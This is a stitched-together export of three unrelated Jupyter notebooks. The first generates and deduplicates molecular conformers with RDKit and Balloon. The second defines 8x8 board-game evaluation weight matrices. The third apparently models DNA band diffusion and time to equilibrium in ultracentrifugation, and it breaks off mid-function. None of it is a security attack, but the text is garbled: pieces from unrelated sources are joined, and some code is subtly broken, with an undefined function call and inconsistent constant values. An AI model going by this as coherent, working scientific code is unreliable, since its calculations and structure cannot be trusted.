inps_m13_b_sdf = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_crystalsdf/*.sdf')
inps_m13_b_smi = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_crystalsmiles/*.sdf')
inps_m13_b_ss_sa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_ss_sa/*.sdf')
inps_m13_b_ss_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_ss_aa/*.sdf')
inps_m13_b_sa_sa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_sa_sa/*.sdf')
inps_m13_b_sa_as = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_sa_as/*.sdf')
inps_m13_b_sa_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_sa_aa/*.sdf')
inps_m13_b_aa_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_aa_aa/*.sdf')
e_m13_b_sdf = grep_energies_from_sdf_outputs(inps_m13_b_sdf)
e_m13_b_smi = grep_energies_from_sdf_outputs(inps_m13_b_smi)
e_m13_b_ss_sa = grep_energies_from_sdf_outputs(inps_m13_b_ss_sa)
e_m13_b_ss_aa = grep_energies_from_sdf_outputs(inps_m13_b_ss_aa)
e_m13_b_sa_sa = grep_energies_from_sdf_outputs(inps_m13_b_sa_sa)
e_m13_b_sa_as = grep_energies_from_sdf_outputs(inps_m13_b_sa_as)
e_m13_b_sa_aa = grep_energies_from_sdf_outputs(inps_m13_b_sa_aa)
e_m13_b_aa_aa = grep_energies_from_sdf_outputs(inps_m13_b_aa_aa)
# write conformers to dictionaries
suppl_m13_b_sdf = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_crystal_sdfout.sdf')
suppl_m13_b_smi = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_crystal_smilesout.sdf')
suppl_m13_b_ss_sa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_ss_sa_sdfout.sdf')
suppl_m13_b_ss_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_ss_aa_sdfout.sdf')
suppl_m13_b_sa_sa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_sa_sa_sdfout.sdf')
suppl_m13_b_sa_as = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_sa_as_sdfout.sdf')
suppl_m13_b_sa_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_sa_aa_sdfout.sdf')
suppl_m13_b_aa_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_aa_aa_sdfout.sdf')
allmol_m13_b_sdf = write_to_dict("m13_b_sdf_", suppl_m13_b_sdf)
allmol_m13_b_smi = write_to_dict("m13_b_smi_", suppl_m13_b_smi)
allmol_m13_b_ss_sa = write_to_dict("m13_b_ss_sa_", suppl_m13_b_ss_sa)
allmol_m13_b_ss_aa = write_to_dict("m13_b_ss_aa_", suppl_m13_b_ss_aa)
allmol_m13_b_sa_sa = write_to_dict("m13_b_sa_sa_", suppl_m13_b_sa_sa)
allmol_m13_b_sa_as = write_to_dict("m13_b_sa_as_", suppl_m13_b_sa_as)
allmol_m13_b_sa_aa = write_to_dict("m13_b_sa_aa_", suppl_m13_b_sa_aa)
allmol_m13_b_aa_aa = write_to_dict("m13_b_aa_aa_", suppl_m13_b_aa_aa)
###Output
_____no_output_____
###Markdown
pre-screening All generated structures are pre-optimized with MM methods (MMFF94-like force field). To remove potential duplicates, we will:* calculate the root-mean-square-distance (RMSD) between the pairs of conformers (taking into account non-hydrogen atoms only);* compare the energies of conformers from pairs which are found to be similar (RMSD lower than the threshold);* if these energies are too similar (the difference lower than the threshold), we will remove the conformer which has the higher energy value;
###Code
allmol_m13_b = {}
allmol_m13_b.update(allmol_m13_b_sdf)
allmol_m13_b.update(allmol_m13_b_smi)
allmol_m13_b.update(allmol_m13_b_ss_sa)
allmol_m13_b.update(allmol_m13_b_ss_aa)
allmol_m13_b.update(allmol_m13_b_sa_sa)
allmol_m13_b.update(allmol_m13_b_sa_as)
allmol_m13_b.update(allmol_m13_b_sa_aa)
allmol_m13_b.update(allmol_m13_b_aa_aa)
print("The total number of generated conformers (before the duplicates removal) = ", len(allmol_m13_b))
energy_m13_b = {}
energy_m13_b.update(e_m13_b_sdf)
energy_m13_b.update(e_m13_b_smi)
energy_m13_b.update(e_m13_b_ss_sa)
energy_m13_b.update(e_m13_b_ss_aa)
energy_m13_b.update(e_m13_b_sa_sa)
energy_m13_b.update(e_m13_b_sa_as)
energy_m13_b.update(e_m13_b_sa_aa)
energy_m13_b.update(e_m13_b_aa_aa)
# 1. calculate the similarity matrix between all pairs of conformers and sort its elements from the lowest
# (the most similar structures) to the largest values (the most different structures)
similarity_matrix_b = make_similarity_matrix(allmol_m13_b)
similarity_matrix_b_sorted = sorted(similarity_matrix_b.items(), key=lambda x: x[1])
# 2. remove duplicates:
# for all pairs of structures, for which the similarity value is lower than threshold ("similarity_thresh"),
# compare energies; then if the energies are similar (controlled by the "energy_thresh"),
#then remove the one with higher energy
to_be_deleted = find_duplicates_in_sorted_similarity_matrix(similarity_matrix_b_sorted, energy_m13_b)
for mol in to_be_deleted:
#print("to_be_deleted: ", mol)
to_be_deleted_keys = list(k for k in similarity_matrix_b.keys() if mol in k)
for k in to_be_deleted_keys:
del similarity_matrix_b[k]
allmol_m13_b.pop(mol, None)
energy_m13_b.pop(mol, None)
print("We have removed potential conformer duplicates.")
print("The final number of remaining conformers = ", len(allmol_m13_b))
print("Below we present all the remaining conformers aligned (to one aromatic ring).")
align_structures_to_lowest_energy(allmol_m13_b, energy_m13_b)
p_b = prepare_view(allmol_m13_b)
p_b.show()
print("Sorted energy of all selected conformers and the energy differences with respect to the lowest:")
energy_b_sorted = sorted(energy_m13_b.items(), key=lambda x: x[1])
energy_b_diff = []
e_b_min = energy_b_sorted[0][1]
for e in energy_b_sorted:
e_diff = e[1] - e_b_min
energy_b_diff.append([e[0], e[1], e_diff])
e_b_df = pd.DataFrame(energy_b_diff, columns=["conformer", "E", "E - Emin"])
e_b_df
###Output
Sorted energy of all selected conformers and the energy differences with respect to the lowest:
###Markdown
Conformers generated with the RDKit software: Conformers were generated in the RDKit software with the following starting structures:* the crystal geometry (3D), results with prefix: "m13_b_sdf"; the crystal is of the "ss-ss" type;* the SMILES signature of m13 ("0D"), program was allowed to "rebuild the geometry" (option "--rebuildGeometry"), results with prefix: "m13_b_smi"* 3D structures generated in Avogadro (from the crystal geometry and pre-optimized) of the: * "ss_sa" type * "ss_aa" type * "sa_sa" type * "sa_as" type * "sa_aa" type * "aa_aa" type where "ss\_sa" means "(ring1: syn-syn)\_(ring2: syn-anti)" configuration of the amide groups, paired by the neighbouring aromatic ring, etc.In all cases the RDKit software was asked to generate 100 conformers using the distnce geometry algorithm with default settings (only "pruneRmsThresh" set to 1.0 in "AllChem.EmbedMultipleConfs" and "maxIters" set to 500 or 700 (when needed) in "AllChem.UFFOptimizeMolecule").The generated conformer structures are presented in a separate notebook: [link](http://nbviewer.jupyter.org/github/gosiao/icho-notebooks/blob/master/conformers_m13_suppl1.ipynb).
###Code
inps_m13_rdkit_smi = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_crystal_from_smiles/*.sdf')
inps_m13_rdkit_sdf = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_crystal_from_sdf/*.sdf')
inps_m13_rdkit_ss_sa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_ss_sa/*.sdf')
inps_m13_rdkit_ss_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_ss_aa/*.sdf')
inps_m13_rdkit_sa_sa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_sa_sa/*.sdf')
inps_m13_rdkit_sa_as = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_sa_as/*.sdf')
inps_m13_rdkit_sa_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_sa_aa/*.sdf')
inps_m13_rdkit_aa_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_aa_aa/*.sdf')
e_m13_rdkit_smi = grep_energies_from_sdf_outputs(inps_m13_rdkit_smi)
e_m13_rdkit_sdf = grep_energies_from_sdf_outputs(inps_m13_rdkit_sdf)
e_m13_rdkit_ss_sa = grep_energies_from_sdf_outputs(inps_m13_rdkit_ss_sa)
e_m13_rdkit_ss_aa = grep_energies_from_sdf_outputs(inps_m13_rdkit_ss_aa)
e_m13_rdkit_sa_sa = grep_energies_from_sdf_outputs(inps_m13_rdkit_sa_sa)
e_m13_rdkit_sa_as = grep_energies_from_sdf_outputs(inps_m13_rdkit_sa_as)
e_m13_rdkit_sa_aa = grep_energies_from_sdf_outputs(inps_m13_rdkit_sa_aa)
e_m13_rdkit_aa_aa = grep_energies_from_sdf_outputs(inps_m13_rdkit_aa_aa)
# write conformers to dictionaries
suppl_m13_rdkit_smi = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_smiles.sdf')
suppl_m13_rdkit_sdf = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_sdf.sdf')
suppl_m13_rdkit_ss_sa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_ss_sa.sdf')
suppl_m13_rdkit_ss_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_ss_aa.sdf')
suppl_m13_rdkit_sa_sa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_sa_sa.sdf')
suppl_m13_rdkit_sa_as = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_sa_as.sdf')
suppl_m13_rdkit_sa_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_sa_aa.sdf')
suppl_m13_rdkit_aa_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_aa_aa.sdf')
allmol_m13_rdkit_smi = write_to_dict("m13_rdkit_smi_", suppl_m13_rdkit_smi)
allmol_m13_rdkit_sdf = write_to_dict("m13_rdkit_sdf_", suppl_m13_rdkit_sdf)
allmol_m13_rdkit_ss_sa = write_to_dict("m13_rdkit_ss_sa_", suppl_m13_rdkit_ss_sa)
allmol_m13_rdkit_ss_aa = write_to_dict("m13_rdkit_ss_aa_", suppl_m13_rdkit_ss_aa)
allmol_m13_rdkit_sa_sa = write_to_dict("m13_rdkit_sa_sa_", suppl_m13_rdkit_sa_sa)
allmol_m13_rdkit_sa_as = write_to_dict("m13_rdkit_sa_as_", suppl_m13_rdkit_sa_as)
allmol_m13_rdkit_sa_aa = write_to_dict("m13_rdkit_sa_aa_", suppl_m13_rdkit_sa_aa)
allmol_m13_rdkit_aa_aa = write_to_dict("m13_rdkit_aa_aa_", suppl_m13_rdkit_aa_aa)
###Output
_____no_output_____
###Markdown
pre-screening All the generated structures are pre-optimized with MM methods (UFF force field). To remove potential duplicates, we will:* calculate the root-mean-square-distance (RMSD) between the pairs of conformers (taking into account non-hydrogen atoms only);* compare the energies of conformers from pairs which are found to be similar (RMSD lower than the threshold);* if these energies are too similar (the difference lower than the threshold), we will remove the conformer which has the higher energy value;
###Code
allmol_m13_rdkit = {}
allmol_m13_rdkit.update(allmol_m13_rdkit_sdf)
allmol_m13_rdkit.update(allmol_m13_rdkit_smi)
allmol_m13_rdkit.update(allmol_m13_rdkit_ss_sa)
allmol_m13_rdkit.update(allmol_m13_rdkit_ss_aa)
allmol_m13_rdkit.update(allmol_m13_rdkit_sa_sa)
allmol_m13_rdkit.update(allmol_m13_rdkit_sa_as)
allmol_m13_rdkit.update(allmol_m13_rdkit_sa_aa)
allmol_m13_rdkit.update(allmol_m13_rdkit_aa_aa)
print("The total number of generated conformers (before the duplicates removal) = ", len(allmol_m13_rdkit))
energy_m13_rdkit = {}
energy_m13_rdkit.update(e_m13_rdkit_sdf)
energy_m13_rdkit.update(e_m13_rdkit_smi)
energy_m13_rdkit.update(e_m13_rdkit_ss_sa)
energy_m13_rdkit.update(e_m13_rdkit_ss_aa)
energy_m13_rdkit.update(e_m13_rdkit_sa_sa)
energy_m13_rdkit.update(e_m13_rdkit_sa_as)
energy_m13_rdkit.update(e_m13_rdkit_sa_aa)
energy_m13_rdkit.update(e_m13_rdkit_aa_aa)
# 1. calculate the similarity matrix between all pairs of conformers and sort its elements from the lowest
# (the most similar structures) to the largest values (the most different structures)
similarity_matrix_rdkit = make_similarity_matrix(allmol_m13_rdkit)
similarity_matrix_rdkit_sorted = sorted(similarity_matrix_rdkit.items(), key=lambda x: x[1])
# 2. remove duplicates:
# for all pairs of structures, for which the similarity value is lower than threshold ("similarity_thresh"),
# compare energies; then if the energies are similar (controlled by the "energy_thresh"),
#then remove the one with higher energy
to_be_deleted = find_duplicates_in_sorted_similarity_matrix(similarity_matrix_rdkit_sorted, energy_m13_rdkit)
for mol in to_be_deleted:
#print("to_be_deleted: ", mol)
to_be_deleted_keys = list(k for k in similarity_matrix_rdkit.keys() if mol in k)
for k in to_be_deleted_keys:
del similarity_matrix_rdkit[k]
allmol_m13_rdkit.pop(mol, None)
energy_m13_rdkit.pop(mol, None)
print("We have removed potential conformer duplicates.")
print("The final number of remaining conformers = ", len(allmol_m13_rdkit))
print("Below we present all the remaining conformers aligned (to one aromatic ring).")
align_structures_to_lowest_energy(allmol_m13_rdkit, energy_m13_rdkit)
p_rdkit = prepare_view(allmol_m13_rdkit)
p_rdkit.show()
print("Sorted energy of all selected conformers and the energy differences with respect to the lowest:")
energy_rdkit_sorted = sorted(energy_m13_rdkit.items(), key=lambda x: x[1])
energy_rdkit_diff = []
e_rdkit_min = energy_rdkit_sorted[0][1]
for e in energy_rdkit_sorted:
e_diff = e[1] - e_rdkit_min
energy_rdkit_diff.append([e[0], e[1], e_diff])
e_rdkit_df = pd.DataFrame(energy_rdkit_diff, columns=["conformer", "E", "E - Emin"])
e_rdkit_df
###Output
Sorted energy of all selected conformers and the energy differences with respect to the lowest:
###Markdown
Summary Now let's generate a list of all conformers (from all programs used) and align them. These conformers will further be used as starting points in DFT geometry optimizations
###Code
allmol_m13 = {}
allmol_m13.update(allmol_m13_b)
allmol_m13.update(allmol_m13_rdkit)
energy_m13 = {}
energy_m13.update(energy_m13_b)
energy_m13.update(energy_m13_rdkit)
###Output
_____no_output_____
###Markdown
The total number of conformers is:
###Code
print(len(allmol_m13))
align_structures_to_lowest_energy(allmol_m13, energy_m13)
p_all = prepare_view(allmol_m13)
p_all.show()
#Write the selected conformers' names to the list "list_selected_conformers_from_balloon_rdkit".
# It will be used to generate Gaussian inputs:
with open("/home/gosia/work/work_on_gitlab/icho/calcs/m13/list_selected_conformers_from_ballon_rdkit", "w") as f:
for key, mol in allmol_m13.items():
f.write(key+"\n")
energy_sorted = sorted(energy_m13.items(), key=lambda x: x[1])
with open("/home/gosia/work/work_on_gitlab/icho/calcs/m13/detailed_list_selected_conformers_from_ballon_rdkit", "w") as f:
for pair in energy_sorted:
f.write("{0:30} {1}\n".format(pair[0], pair[1]))
###Output
_____no_output_____ |
sita/genetic_sur/01/creat_eva.ipynb | ###Markdown
80~100, 615~635
###Code
eva = []
name = []
name_ele = "normal"
eva_ele = [
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
# 13
name_ele = "custom"
eva_ele = [
[1.0, 0.1, 0.5, 0.1, 0.1, 0.1, 0.1, 1.0],
[0.1, 0.5, 0.1, 0.1, 0.1, 0.1, 0.5, 0.1],
[0.1, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.1],
[0.1, 0.1, 0.1, 0.5, 0.5, 0.1, 0.1, 0.1],
[0.1, 0.1, 0.1, 0.5, 0.5, 0.1, 0.1, 0.1],
[0.1, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.1],
[0.1, 0.5, 0.1, 0.1, 0.1, 0.1, 0.5, 0.1],
[1.0, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
# 20
name_ele = "eva_my"
eva_ele = [
[ 1.0, -1.0, 0.5, 0.1, 0.1, 0.5, -1.0, 1.0],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 0.5, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.5],
[ 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1],
[ 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1],
[ 0.5, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.5],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 1.0, -1.0, 0.5, 0.1, 0.1, 0.5, -1.0, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
name_ele = "corner"
eva_ele = [
[ 1.0, -1.0, 0.5, 0.5, 0.5, 0.5, -1.0, 1.0],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 0.5, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.5],
[ 0.5, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.5],
[ 0.5, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.5],
[ 0.5, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.5],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 1.0, -1.0, 0.5, 0.5, 0.5, 0.5, -1.0, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
name_ele = "box"
eva_ele = [
[ 1.0, -1.0, 0.5, 0.1, 0.1, 0.5, -1.0, 1.0],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 0.5, 0.1, 1.0, 0.1, 0.1, 1.0, 0.1, 0.5],
[ 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1],
[ 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1],
[ 0.5, 0.1, 1.0, 0.1, 0.1, 1.0, 0.1, 0.5],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 1.0, -1.0, 0.5, 0.1, 0.1, 0.5, -1.0, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
name_ele = "box_corner"
eva_ele = [
[ 1.0, -1.0, 0.5, 0.5, 0.5, 0.5, -1.0, 1.0],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 0.5, 0.1, 1.0, 0.1, 0.1, 1.0, 0.1, 0.5],
[ 0.5, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.5],
[ 0.5, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.5],
[ 0.5, 0.1, 1.0, 0.1, 0.1, 1.0, 0.1, 0.5],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 1.0, -1.0, 0.5, 0.5, 0.5, 0.5, -1.0, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
name_ele = "weak"
eva_ele = [
[-1.0, 1.0, -0.5, -0.1, -0.1, -0.5, 1.0, -1.0],
[ 1.0, 1.0, -0.1, -0.1, -0.1, -0.1, 1.0, 1.0],
[-0.5, -0.1, -0.5, -0.1, -0.1, -0.5, -0.1, -0.5],
[-0.1, -0.1, -0.1, -0.1, -0.1, -0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1, -0.1, -0.1, -0.1, -0.1, -0.1],
[-0.5, -0.1, -0.5, -0.1, -0.1, -0.5, -0.1, -0.5],
[ 1.0, 1.0, -0.1, -0.1, -0.1, -0.1, 1.0, 1.0],
[-1.0, 1.0, -0.5, -0.1, -0.1, -0.5, 1.0, -1.0]
]
name.append(name_ele)
eva.append(eva_ele)
# 15
name_ele = "fifteen"
eva_ele = [
[ 0.2, -0.2, 0.3, -0.9, -0.2, 0.5, 0.5, -0.5],
[ 0.9, 0.9, -0.4, 0.3, 0.8, -0.5, 0.4, -0.6],
[ 0.9, -1.0, -0.3, 0.8, 0.1, -0.1, -0.9, 0.8],
[-0.8, 0.6, 0.1, -0.2, 0.8, -0.7, 0.1, 0.4],
[ 0.3, 0.9, 1.0, 0.4, -0.7, -0.7, 0.7, -0.1],
[ 0.2, 0.7, 0.6, -0.1, -0.1, -0.5, -0.9, 0.2],
[ 0.0, 0.0, 0.8, 0.3, -0.3, 0.6, 0.6, -0.7],
[-0.3, 0.2, -0.9, 1.0, 0.0, 0.5, -0.2, -0.1]
]
name.append(name_ele)
eva.append(eva_ele)
# 17
name_ele = "seventeen"
eva_ele = [
[ 0.6, 0.6, 0.7, 0.1, -0.8, -0.8, -0.4, -0.4],
[ 0.0, 0.5, -0.7, -0.1, 0.1, 0.2, 0.5, 0.4],
[ 0.8, -0.4, -0.4, -0.4, 0.3, -0.9, -0.9, 0.8],
[-0.4, 0.9, 0.2, 0.8, -0.3, -0.7, 0.7, -0.9],
[-0.4, 0.1, 0.6, 0.1, -0.4, 0.8, 1.0, 0.9],
[ 1.0, 0.3, 0.3, -0.3, -0.2, -0.4, -0.7, 0.1],
[ 0.1, 0.3, 0.7, 0.4, -0.6, 0.3, -0.8, 0.9],
[ 0.4, 0.2, 0.8, -1.0, 0.4, -0.7, -0.9, -0.6]
]
name.append(name_ele)
eva.append(eva_ele)
# 21
name_ele = "twenty"
eva_ele = [
[-0.4, 0.2, -0.4, 0.1, 0.9, 0.9, 0.9, 0.3],
[ 0.2, 0.3, -0.8, -0.4, -0.4, 0.9, -0.2, 1.0],
[ 0.2, 0.4, -0.3, 0.4, 0.2, -0.5, 0.5, -0.5],
[-0.4, 0.6, -0.2, -0.3, -0.7, 0.4, -0.9, -0.1],
[-0.4, -0.3, 1.0, -0.5, -0.4, 0.9, 0.8, 0.8],
[ 0.2, 1.0, -0.6, 0.8, 0.9, 0.3, 0.8, 0.1],
[-0.4, -0.5, -0.5, 0.9, 0.0, -0.9, -0.6, 0.5],
[ 0.6, 0.2, -0.8, -0.1, 0.4, 0.9, -0.8, 0.5]
]
name.append(name_ele)
eva.append(eva_ele)
eva_file = open("eva_file.txt", "w")
for i in range(len(eva)):
for j in range(8):
for k in range(8):
eva_file.write(str(eva[i][j][k]))
eva_file.write("\n")
eva_file.close()
name_file = open("name_file.txt", "w")
for i in range(len(name)):
name_file.write(name[i])
name_file.write("\n")
name_file.close()
###Output
_____no_output_____ |
ipynb/theory/standard_vs_our_conditions.ipynb | ###Markdown
Description* Determining how differences in our isopycnic cfg conditions vary in meaningful ways from those of Clay et al., 2003. Eur Biophys J* Needed to determine whether the Clay et al., 2003 function describing diffusion is applicable to our data > standard conditions from: Clay et al., 2003. Eur Biophys J* Standard conditions: * 44k rev/min for Beckman XL-A * An-50 Ti Rotor * 44.77k rev/min for Beckman model E * 35k rev/min for preparative ultra-cfg & fractionation * De Sario et al., 1995: vertical rotor: VTi90 (Beckman) * 35k rpm for 16.5 h* Our conditions: * speed (R) = 55k rev/min * radius top/bottom (cm) = 2.6, 4.85 * angular velocity: w = `((2 * 3.14159 * R)/60)^2` * TLA110 rotor
###Code
import numpy as np
%load_ext rpy2.ipython
%%R
library(ggplot2)
library(dplyr)
###Output
_____no_output_____
###Markdown
Beckman XL-A Beckman model E Angular velocity (omega)
###Code
# angular velocity: our setup
angular_vel_f = lambda R: (2 * 3.14159 * R / 60)
print angular_vel_f(55000)
# angular velocity: De Sario et al., 1995
print angular_vel_f(35000)
###Output
5759.58166667
3665.18833333
###Markdown
Meselson et al., 1957 equation on s.d. of band due to diffusion\begin{equation}\sigma^2 = \frac{RT}{M_{PX_n}\bar{\upsilon}_{PX_n} (\frac{dp}{dr})_{r_0} \omega^2 r_0}\end{equation}* R = gas constant* T = temperature (C)* M = molecular weight * PX_n = macromolecular electrolyte* v = partial specific volume (mL/g)* w = angular velocity* r_0 = distance between the band center and rotor center* dp/dr = density gradient Time to equilibrium: vertical rotor radius_max - radius_min = width_of_tube* VTi90 Rotor * radius_max = 71.1 mm * radius_min = 57.9 mm
###Code
%%R -w 14 -h 6 -u in
library(ggplot2)
library(reshape)
library(grid)
# radius top,bottom (cm)
r.top = 57.9 / 10
r.bottom = 71.1 / 10
# isoconcentration point
I = sqrt((r.top^2 + r.top * r.bottom + r.bottom^2)/3)
# rpm
R = 35000
# particle density
D = 1.70
# beta^o
B = 1.14e9
# dna in bp from 0.1kb - 100kb
L = seq(100, 100000, 100)
# angular velocity
## 2*pi*rpm / 60
w = ((2 * 3.14159 * R)/60)^2
# DNA GC content
G.C = seq(0.1, 0.9, 0.05)
# Molecular weight
# M.W in relation to GC content (dsDNA)
A = 313.2
T = 304.2
C = 289.2
G = 329.2
GC = G + C
AT = A + T
#GC2MW = function(x){ x*GC + (1-x)*AT + 157 } # assuming 5' monophosphate on end of molecules
GC2MW = function(x){ x*GC + (1-x)*AT }
M.W = sapply(G.C, GC2MW)
# buoyant density
## GC_fraction = (p - 1.66) / 0.098
GC2buoyant.density = function(x){ (x * 0.098) + 1.66 }
B.D = GC2buoyant.density(G.C)
# radius of the isoconcentration point from cfg center (AKA: r.p)
## position of the particle at equilibrium
buoyant.density2radius = function(x){ sqrt( ((x-D)*2*B/w) + I^2 ) }
P = buoyant.density2radius(B.D)
# calculating S
S.fun = function(L){ 2.8 + (0.00834 * (L*M.W)^0.479) }
S = t(sapply( L, S.fun ))
# calculating T
T = matrix(ncol=17, nrow=length(L))
for(i in 1:ncol(S)){
T[,i] = 1.13e14 * B * (D-1) / (R^4 * P[i]^2 * S[,i])
}
## formating
T = as.data.frame(T)
colnames(T) = G.C
T$dna_size__kb = L / 1000
T.m = melt(T, id.vars=c('dna_size__kb'))
colnames(T.m) = c('dna_size__kb', 'GC_content', 'time__h')
#T.m$GC_content = as.numeric(as.character(T.m$GC_content))
## plotting
p = ggplot(T.m, aes(dna_size__kb, time__h, color=GC_content, group=GC_content)) +
geom_line() +
scale_y_continuous(limits=c(0,175)) +
labs(x='DNA length (kb)', y='Time (hr)') +
scale_color_discrete(name='GC content') +
#geom_hline(yintercept=66, linetype='dashed', alpha=0.5) +
theme( text = element_text(size=18) )
#print(p)
# plotting at small scale
p.sub = ggplot(T.m, aes(dna_size__kb, time__h, color=GC_content, group=GC_content)) +
geom_line() +
scale_x_continuous(limits=c(0,5)) +
scale_y_continuous(limits=c(0,175)) +
labs(x='DNA length (kb)', y='Time (hr)') +
scale_color_discrete(name='GC content') +
#geom_hline(yintercept=66, linetype='dashed', alpha=0.5) +
theme(
text = element_text(size=14),
legend.position = 'none'
)
vp = viewport(width=0.43, height=0.52, x = 0.65, y = 0.68)
print(p)
print(p.sub, vp=vp)
###Output
_____no_output_____
###Markdown
Plotting band s.d. as defined the ultra-cfg technical manual density gradient\begin{equation}\frac{d\rho}{dr} = \frac{\omega^2r}{\beta}\end{equation} band standard deviation\begin{equation}\sigma^2 = \frac{\theta}{M_{app}}\frac{RT}{(\frac{d\rho}{dr})_{eff} \omega^2r_o}\end{equation} combined\begin{equation}\sigma^2 = \frac{\theta}{M_{app}}\frac{RT}{\frac{\omega^4r_o^2}{\beta}}\end{equation} buoyant density of a molecule\begin{equation}\theta = \rho_i + \frac{\omega^2}{2\beta}(r_o^2 - r_1^2)\end{equation} standard deviation due to diffusion (Clay et al., 2003)\begin{equation}\sigma_{diffusion}^2 = \Big(\frac{100%}{0.098}\Big)^2 \frac{\rho RT}{\beta_B^2GM_{Cs}} \frac{1}{1000l}\end{equation}
###Code
%%R
# gas constant
R = 8.3144621e7 #J / mol*K
# temp
T = 273.15 + 23 # 23oC
# rotor speed (rpm)
S = 55000
# beta^o
beta = 1.14 * 10^-9
#beta = 1.195 * 10^-10
# G
G = 7.87 * 10^10 #cgs
# angular velocity
## 2*pi*rpm / 60
omega = 2 * pi * S /60
# GC
GC = seq(0,1,0.1)
# lengths
lens = seq(1000, 100000, 10000)
# molecular weight
GC2MW.dry = function(x){
A = 313.2
T = 304.2
C = 289.2
G = 329.2
GC = G + C
AT = A + T
x*GC + (1-x)*AT
}
M.dry = sapply(GC, GC2MW)
GC2MW.dryCS = function(n){
#n = number of bases
